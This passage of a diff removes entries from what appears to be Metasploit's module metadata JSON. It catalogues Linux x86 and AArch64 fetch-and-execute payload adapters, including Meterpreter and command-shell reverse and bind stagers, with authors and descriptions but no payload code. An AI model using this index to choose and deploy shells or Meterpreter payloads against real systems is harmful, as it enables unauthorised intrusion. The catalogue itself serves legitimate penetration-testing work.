{}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_nonx_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_tcp": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/http/x86/meterpreter/reverse_tcp_uuid": { - "name": "HTTP Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "William Webb ", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/meterpreter", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/http/x86/meterpreter_reverse_http": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/http/x86/meterpreter_reverse_https": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/http/x86/meterpreter_reverse_tcp": { - "name": "HTTP Fetch", - "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/metsvc_bind_tcp": { - "name": "HTTP Fetch, Linux Meterpreter Service, Bind TCP", - "fullname": "payload/cmd/linux/http/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/metsvc_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/metsvc_reverse_tcp": { - "name": "HTTP Fetch, Linux Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hdm " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/metsvc_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/read_file": { - "name": "HTTP Fetch, Linux Read File", - "fullname": "payload/cmd/linux/http/x86/read_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "hal" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/read_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/read_file", - "staged": false - }, - "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid": { - "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" - }, - "payload_cmd/linux/http/x86/shell/bind_nonx_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_nonx_tcp" - }, - "payload_cmd/linux/http/x86/shell/bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/http/x86/shell/bind_tcp_uuid": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/http/x86/shell/find_tag": { - "name": "HTTP Fetch, Linux Command Shell, Find Tag Stager", - "fullname": "payload/cmd/linux/http/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/find_tag", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/http/x86/shell/reverse_ipv6_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/http/x86/shell/reverse_nonx_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/http/x86/shell/reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/http/x86/shell/reverse_tcp_uuid": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/http/x86/shell_bind_ipv6_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_bind_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_bind_tcp_random_port": { - "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Geyslan G. Bem ", - "Aleh Boitsau " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_find_port": { - "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/http/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_find_port", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_find_tag": { - "name": "HTTP Fetch, Linux Command Shell, Find Tag Inline", - "fullname": "payload/cmd/linux/http/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_find_tag", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_reverse_tcp": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle ", - "joev " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/http/x86/shell_reverse_tcp_ipv6": { - "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Matteo Malvica " - ], - "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/http/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/http/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", - "staged": false - }, - "payload_cmd/linux/https/aarch64/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack " - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/https/aarch64/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - 